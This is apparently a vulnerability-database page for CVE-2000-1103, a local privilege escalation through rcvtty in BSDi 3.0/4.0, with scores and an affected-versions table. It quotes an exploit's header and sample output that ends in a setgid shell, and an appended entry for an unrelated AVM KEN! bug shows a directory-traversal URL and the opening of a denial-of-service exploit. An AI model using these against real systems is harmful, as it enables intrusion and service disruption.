CVE-2000-1103
Published 2001-01-09
Priority: P423 | high | 7.2 (CVSS 2.0)
CVSS vector: AV:L/AC:L/Au:N/C:C/I:C/A:C
EXPLOIT
EPSS: 0.94% (56.5th percentile)
rcvtty in BSD 3.0 and 4.0 does not properly drop privileges before executing a script, which allows local attackers to gain privileges by specifying an alternate Trojan horse script on the command line.
Affected
4 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| bsdi | bsd_os | — | — |
| bsdi | bsd_os | — | — |
| bsdi | bsd_os | — | — |
| bsdi | bsd_os | — | — |
No detection rules found.
Exploit-DB
BSDi 3.0/4.0 - 'rcvtty[mh]' Local Privilege Escalation
exploitdb·2000-11-21
CVE-2000-1103 BSDi 3.0/4.0 - 'rcvtty[mh]' Local Privilege Escalation
---
/*
(BSDi3.0/4.0)rcvtty[mh] local exploit, by v9[[email protected]]. this exploit
is for the rcvtty of the mh package, which is setgid=4(tty) on BSDi. this
exploit gives you egid/group=4(tty) access.
example:
bash-2.02$ id
uid=101(v9) gid=100(user) groups=100(user)
bash-2.02$ cc xrcvtty.c -o xrcvtty
bash-2.02$ ./xrcvtty
[ (BSDi3.0/4.0)rcvtty[mh] local exploit, by v9[[email protected]]. ]
[*] /usr/contrib/mh/lib/rcvtty appears to be setgid.
[*] now making shell script to execute.
[*] done, now building and executing the command line.
[*] done, now checking for success.
[*] success, /tmp/ttysh is now setgid.
[*] finished, everything appeared to have gone successful.
[?] do you wish to enter the sgidshell now(y/n)?: y
[*] ok, executing
Exploit-DB
AVM KEN! 1.3.10/1.4.30 - Remote Denial of Service
exploitdb·2000-04-12
CVE-2000-0262 AVM KEN! 1.3.10/1.4.30 - Remote Denial of Service
---
source: https://www.securityfocus.com/bid/1103/info
A remote user on the local network is capable of retrieving any known file from a machine running AVM KEN!. This is accomplished by appending ../ to a URL utilizing port 3128 to escape the regular web file structure, and appending the remaining path onto the request.
eg.
http://target:3128/../../../filename.ext
A denial of service attack could also be launched against AVM KEN! by sending random characters to port 3128. A restart would be required in order to regain normal functionality.
import java.net.Socket;
import java.io.*;
/*
BARBIE - The AVM KEN! exploit
This exploit causes a crash in the AVM KEN! ISDN Proxy software.
All connections will be cut off, but the server will res
No writeups or analysis indexed.
Published: 2001-01-09